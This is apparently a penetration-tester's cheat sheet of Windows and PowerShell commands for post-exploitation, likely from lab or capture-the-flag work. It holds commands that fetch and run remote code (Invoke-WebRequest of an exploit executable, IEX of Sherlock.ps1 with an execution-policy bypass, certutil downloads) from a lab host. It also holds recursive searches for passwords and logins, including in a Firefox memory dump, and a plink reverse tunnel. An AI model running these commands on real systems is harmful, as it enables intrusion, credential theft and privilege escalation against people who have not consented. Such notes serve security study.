Windows
Powershell
Command Line
Impacket
PE Tools

Searching

1
Get-ChildItem -Path "C:\Users\Chase\Desktop\2104firefox.dmp" -Recurse -File | Select-String login
Copied!

Download

1
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'"
Copied!

Execution

1
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
Copied!

Recurse List the access file

1
gci -recurse –include *.* | select Fullname
Copied!
Search file
1
dir abc.txt /s /p
2
findstr /i /s "password" *.*
3
4
#Answer the promot message with "y"
5
cmd.exe /c echo y | plink.exe -ssh –l username –pw password –R
6
Copied!
download a file
certutil.exe - urlcache -split -f http://ip/file file
Impacket
SecureAuth
PEASS-ng/winPEAS/winPEASexe at master · carlospolop/PEASS-ng
GitHub
Windows Privilege Escalation Guide
Last modified 11mo ago
Copy link